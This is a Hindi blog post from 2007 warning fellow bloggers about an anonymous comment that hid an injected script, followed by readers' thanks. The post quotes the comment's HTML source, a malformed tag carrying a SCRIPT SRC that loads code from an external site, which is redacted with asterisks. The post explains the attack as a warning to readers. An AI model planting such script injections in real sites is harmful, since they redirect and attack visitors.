---प्रायोजक---

---***---

हिंदी कंप्यूटिंग समस्या समाधान हेतु खोजें

बेनामी टिप्पणियों से सावधान!

साझा करें:

पिछले दिनों इस चिट्ठे के एक पोस्ट में एक बेनामी टिप्पणी आई जो कुछ यूँ थी – asdlkhaaaaaaaa aaaaefaf"> " मुझे लगा कि ये मेरे कि...



पिछले दिनों इस चिट्ठे के एक पोस्ट में एक बेनामी टिप्पणी आई जो कुछ यूँ थी –

asdlkhaaaaaaaa
aaaaefaf">
"

मुझे लगा कि ये मेरे किसी ब्लॉग प्रशंसक (या धुर-आलोचक) की टिप्पणी है जो संभवतः हिन्दी में लिखना चाह रहा होगा और बेचारा कुछ समस्या के कारण लिख नहीं पा रहा होगा.

मेरे ईमेल में इसकी सूचना मिलते ही वस्तु-स्थिति जांचने अपने चिट्ठे पर जब उस टिप्पणी को देखने गया तो एक अजीब घटना हुई.

चिट्ठे पर टिप्पणी देखने की कड़ी को क्लिक करते ही वह ब्राउज़र को दूसरी साइट पर ले जाने लगा, और फ़ॉयरफ़ॉक्स के सुरक्षा तंत्र ने सचेत किया कि यह एक असुरक्षित साइट है.

एक सेकंड को तो कुछ समझ में नहीं आया कि ये क्या हो रहा है, परंतु फिर एकाएक बिजली कौंधी.

मुझे लगा कि हो न हो इस टिप्पणी में कुछ स्क्रिप्ट / कोड छुपा है – हालांकि ब्लॉगर किसी अवांछित कोड को टिप्पणी में डालने नहीं देता है, फिर भी होशियारी से कोई अवांछित कोड डालने में सफल हो ही चुका था.

उस टिप्पणी के एचटीएमएल स्रोत को देखने पर वह कुछ ऐसा दिखा –

<a href=3D"http://raviratlami.blogspo=
t.com/2007/07/u-s.html">=C2=BF=C7=9D=C9=B9=C7=9D=C9=A5 u=C7=9D=CA=87=CA=87=
=C4=B1=C9=B9=CA=8D s=C4=B1 =CA=87=C9=90=C9=A5=CA=8D</a>&quot;:  <br><br> <B=
 <SCRIPT SRC=3D"http://*****************/js/"/>asdlkhaaaaaaaa<BR/>aa=
aaefaf"> </B>" <br><br>  <font color=3D"gray" size=3D"2"> <br>

जाहिर है, यह जो अपठनीय पाठ टिप्पणी के रूप में लिखा था, उसमें उस शैतानी साइट पर उपलब्ध शैतानी स्क्रिप्ट की कड़ी थी (जिसे मिटाकर ****** बना दिया गया है) जिसे लिंक किया गया था. ब्लॉगर टिप्पणी में आप किसी भी जाल पृष्ठ को लिंक कर सकते हैं – इसी सुविधा का लाभ यहाँ उठाया गया था. और मेरे चिट्ठे पर हमला किया था. आमतौर पर ऐसे चिट्ठे स्वचालित बॉट द्वारा किए जाते हैं जो एक साथ हजारों लाखों इंटरनेट पृष्ठों को अपना शिकार बनाने की कोशिश करते हैं – सुरक्षा की खामियाँ जहाँ दिखती हैं, वे उसी का इस्तेमाल करते हैं.

रहा सवाल जाल पृष्ठों पर हमलों का, तो कोई भी कभी भी सुरक्षित नहीं है – यह दुनिया रिलेटिव है. ये खबर देखें, जो ज्यादा पुरानी नहीं है – माइक्रोसॉफ़्ट की एक साइट को एक हैकर ने हैक कर उसमें सऊदी अरब का झंडा लहरा दिया था. हमला उसी तरह के डाटाबेस में हुआ था जिसमें हमारे आपके चिट्ठों के पाठ - चाहे वे ब्लॉगर के हों या वर्डप्रेस के - भंडारित रहते हैं.

ब्लॉग पोस्टें ऐसे स्पैम कमेंट से पहले भी समस्याग्रस्त रहती थीं और घोर समस्याग्रस्त रहती थीं. और इसी वजह से ज्ञानदत्त जैसे पाठकों को हो रही विशेष कठिनाइयों के बावजूद मेरे चिट्ठे की टिप्पणियों पर वर्ड-वेरिफ़िकेशन चलता रहा था. बीते कुछ दिनों से ऐसी समस्याओं में अच्छी खासी कमी आई थी – ब्लॉगर भी कुछ स्वचालित तंत्रों से स्पैम टिप्पणीकर्ताओं पर नजर रखता रहा था और मैंने वर्ड-वेरिफ़िकेशन को हटा दिया था.

मगर इस एक मात्र अपवाद स्वरूप प्राप्त प्रविष्टि ने मुझे फिर से चौंका दिया है. अगर ऐसे हमले जारी रहें तो फिर से वर्ड-वेरिफ़िकेशन प्रारंभ करना पड़ सकता है, और टिप्पणियों की कमी से भी जूझना पड़ सकता है – क्योंकि, जहाँ वर्ड वेरिफ़िकेशन के आड़े-टेढ़े अक्षर दिखने लगते हैं तो वहां से तो मैं भी कट लेता हूँ :)



टिप्पणियाँ

ब्लॉगर: 10
  1. सही समय मे हमें सचेत किया इसके लिये धंयवाद ।

    उत्तर देंहटाएं
  2. रवि जी, आपने चिट्ठाजगत को एक दम से सावधान करके हम सब के ऊपर बडा एहसान किया है.

    उत्तर देंहटाएं
  3. धन्यवाद रविजी, बहुत काम की बातें लाते हैं आप भी। और मुझ जैसे तकनीक-अपढ़ के लिए आप मां सरस्वती का वरदान हैं।

    उत्तर देंहटाएं
  4. संजय बेंगाणी6:13 pm

    यह गलत बात है की आपने शब्दो को सितारों मे बदल दिया, किसी को उस साइट पर जाना हो तो? स्पैम टिप्पणी की प्रतिक्षा करे? >:

    :)

    मुझे हर दिन पाँच से दस स्पैम मिलती है, मगर मोडरेशन पर है इसलिए शांति है.

    उत्तर देंहटाएं
  5. सचेतने के लिये साधुवाद. इस तरह के उपकार करते रहें तो हम सब बचे रहेंगे. :)

    उत्तर देंहटाएं
  6. बहुत-बहुत धन्यवाद रवि जी आपने बहुत ज्ञान की बात बताई है...

    सुनीता(शानू)

    उत्तर देंहटाएं
  7. mere hindi blog ankurthoughts.blogspot.com par bhee aisa hua tha.
    main to pareshaan ho gaya tha

    उत्तर देंहटाएं
  8. धन्यवाद रवि जी, बडे ही काम की चीज बताई आपने..आगे से सचेत रहेगे ..ऐसी सम्स्याओ से जूझने के लिये.

    उत्तर देंहटाएं
  9. तस्वीर8:53 pm

    रविजी, बहुत बहुत धन्यवाद आपका । मेने भि अपने ब्लगमे वर्ड वेरिफ़िकेशन हटाया था । उसकेबाद कुछ अजिब किसिमके कमेन्ट्स आये आपका ब्लग पढ्नेके बाद इस प्रकारके लोगोंके बारेमा पता चला । धन्यवाद फिर एक बार देना चाहता हुँ आपको

    उत्तर देंहटाएं
  10. ravi ji mera blog misfit/khazaanaa par verification maangaa jata hai kyon ...?
    kyaa kisee ne haik kiyaa hai kya yaa koi galatee hui hai setting me

    उत्तर देंहटाएं

|हिन्दी_$type=blogging$count=8$page=1$va=1$au=0$src=random

|हास्य-व्यंग्य_$type=complex$count=8$page=1$va=0$au=0$src=random

|तकनीक_$type=blogging$au=0$count=7$page=1$src=random-posts

नाम

तकनीकी ,1,अनूप शुक्ल,1,आलेख,6,आसपास की कहानियाँ,127,एलो,1,ऐलो,1,गूगल,1,गूगल एल्लो,1,चोरी,4,छींटे और बौछारें,143,छींटें और बौछारें,337,जियो सिम,1,जुगलबंदी,49,तकनीक,42,तकनीकी,686,फ़िशिंग,1,मंजीत ठाकुर,1,मोबाइल,1,रिलायंस जियो,2,रेंसमवेयर,1,विंडोज रेस्क्यू,1,विविध,373,व्यंग्य,511,संस्मरण,1,साइबर अपराध,1,साइबर क्राइम,1,स्पैम,10,स्प्लॉग,2,हास्य,2,हिन्दी,498,hindi,1,
ltr
item
छींटे और बौछारें: बेनामी टिप्पणियों से सावधान!
बेनामी टिप्पणियों से सावधान!
http://3.bp.blogspot.com/_t-eJZb6SGWU/Ro4OXoK4D_I/AAAAAAAABD4/5KNtYh8rG5M/s400/script+attack.JPG
http://3.bp.blogspot.com/_t-eJZb6SGWU/Ro4OXoK4D_I/AAAAAAAABD4/5KNtYh8rG5M/s72-c/script+attack.JPG
छींटे और बौछारें
https://raviratlami.blogspot.com/2007/07/blog-post_06.html
https://raviratlami.blogspot.com/
https://raviratlami.blogspot.com/
https://raviratlami.blogspot.com/2007/07/blog-post_06.html
true
7370482
UTF-8
सभी पोस्ट लोड किया गया कोई पोस्ट नहीं मिला सभी देखें आगे पढ़ें जवाब दें जवाब रद्द करें मिटाएँ द्वारा मुखपृष्ठ पृष्ठ पोस्ट सभी देखें आपके लिए और रचनाएँ विषय ग्रंथालय SEARCH सभी पोस्ट आपके निवेदन से संबंधित कोई पोस्ट नहीं मिला मुख पृष्ठ पर वापस रविवार सोमवार मंगलवार बुधवार गुरूवार शुक्रवार शनिवार रवि सो मं बु गु शु शनि जनवरी फरवरी मार्च अप्रैल मई जून जुलाई अगस्त सितंबर अक्तूबर नवंबर दिसंबर जन फर मार्च अप्रैल मई जून जुला अग सितं अक्तू नवं दिसं अभी अभी 1 मिनट पहले $$1$$ minutes ago 1 घंटा पहले $$1$$ hours ago कल $$1$$ days ago $$1$$ weeks ago 5 सप्ताह से भी पहले फॉलोअर फॉलो करें यह प्रीमियम सामग्री तालाबंद है चरण 1: साझा करें. चरण 2: ताला खोलने के लिए साझा किए लिंक पर क्लिक करें सभी कोड कॉपी करें सभी कोड चुनें सभी कोड आपके क्लिपबोर्ड में कॉपी हैं कोड / टैक्स्ट कॉपी नहीं किया जा सका. कॉपी करने के लिए [CTRL]+[C] (या Mac पर CMD+C ) कुंजियाँ दबाएँ